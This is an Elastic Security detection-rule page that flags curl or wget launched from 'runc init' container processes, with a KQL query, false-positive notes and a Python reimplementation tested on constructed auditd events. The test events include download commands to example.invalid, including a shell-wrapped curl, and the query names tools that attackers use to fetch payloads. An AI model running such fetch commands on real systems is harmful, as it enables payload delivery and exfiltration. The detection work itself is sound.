Curl or Wget Execution from Container Context

Last updated: 2026-04-22
Created: 2026-04-22

About

Detects execution of curl or wget from processes whose title aligns with **`runc init`**, a common fingerprint for workloads running inside **OCI/runc-backed containers** on Linux hosts instrumented with Auditd Manager. After breaking out of an application container or abusing a privileged workload, attackers often pull ingress tooling (stagers, scripts, implants) or stage exfiltration with minimal HTTP clients. Those utilities are also used benignly in images, so context matters; the `runc init` anchor narrows the signal to the container runtime boundary where unexpected download clients are more worthy of review than the same binaries on a bare-metal admin shell.
Tags
- Domain: Endpoint
- OS: Linux
- Use Case: Threat Detection
- Tactic: Command and Control
- Tactic: Execution
- Domain: Containers
- Data Source: Auditd Manager
- Language: kuery
Severity
medium
Risk Score
47
MITRE ATT&CK™

Command and Control (TA0011)

False Positive Examples
Base images, entrypoints, or init wrappers may legitimately invoke curl or wget during container startup (package installs, health checks); baseline trusted images and exclude stable image digests or namespaces when noisy. Developer-oriented containers and CI build pods can run curl/wget from PID 1 descendants under runc; correlate with build pipelines and approved registries.
License
Elastic License v2

Definition

Rule Type
Query (Kibana Query Language)
Integration Pack
Prebuilt Security Detection Rules
Index Patterns
auditbeat-*
logs-auditd_manager.auditd-*
Related Integrations

auditd_manager

Query
```kuery
host.os.type:linux and
data_stream.dataset:"auditd_manager.auditd" and
event.action:("executed" or "exec") and
process.title:"runc init" and
(
  process.name:(curl or wget) or
  process.args:(* curl* or */bin/curl* or *wget*)
)
```
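An added example, not Elastic's rule code: the query's predicate reimplemented clause by clause in Python and run over constructed auditd_manager-style events, to show that the `process.args` wildcards catch a shell-wrapped curl the `process.name` clause would miss, and that the same binary from a bare-host shell (no `runc init` title) does not fire. Field names are the rule's; every event value is constructed.

```python
import fnmatch

# Constructed events in flattened ECS field names (not real telemetry).
EVENTS = [
    {"host.os.type": "linux", "data_stream.dataset": "auditd_manager.auditd",
     "event.action": "executed", "process.title": "runc init",
     "process.name": "curl", "process.args": ["curl", "-sL", "http://example.invalid/x.sh"]},
    # curl launched via sh -c: process.name is "sh", only the args clause can match
    {"host.os.type": "linux", "data_stream.dataset": "auditd_manager.auditd",
     "event.action": "executed", "process.title": "runc init",
     "process.name": "sh", "process.args": ["sh", "-c", "/usr/bin/curl -O http://example.invalid/x"]},
    # benign in-container exec: should not fire
    {"host.os.type": "linux", "data_stream.dataset": "auditd_manager.auditd",
     "event.action": "executed", "process.title": "runc init",
     "process.name": "ls", "process.args": ["ls", "-la"]},
    # wget from an admin shell on the host, outside the runc init anchor: should not fire
    {"host.os.type": "linux", "data_stream.dataset": "auditd_manager.auditd",
     "event.action": "executed", "process.title": "bash",
     "process.name": "wget", "process.args": ["wget", "http://example.invalid/pkg.deb"]},
]

ARG_PATTERNS = ("* curl*", "*/bin/curl*", "*wget*")  # the rule's process.args wildcards


def matches_rule(ev):
    """Return True when the event satisfies every clause of the KQL rule."""
    if ev.get("host.os.type") != "linux":
        return False
    if ev.get("data_stream.dataset") != "auditd_manager.auditd":
        return False
    if ev.get("event.action") not in ("executed", "exec"):
        return False
    if ev.get("process.title") != "runc init":
        return False
    if ev.get("process.name") in ("curl", "wget"):
        return True
    # KQL '*' wildcards on an array field: any element matching any pattern suffices
    return any(fnmatch.fnmatchcase(arg, pat)
               for arg in ev.get("process.args", []) for pat in ARG_PATTERNS)


def matching_events(events):
    """Filter a batch of events down to those the rule would alert on."""
    return [ev for ev in events if matches_rule(ev)]


if __name__ == "__main__":
    for ev in matching_events(EVENTS):
        print("ALERT:", ev["process.name"], ev["process.args"])
```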

Install detection rules in Elastic Security

Detect Curl or Wget Execution from Container Context in the Elastic Security detection engine by installing this rule into your Elastic Stack.

To set up this rule, check out the installation guide for Prebuilt Security Detection Rules.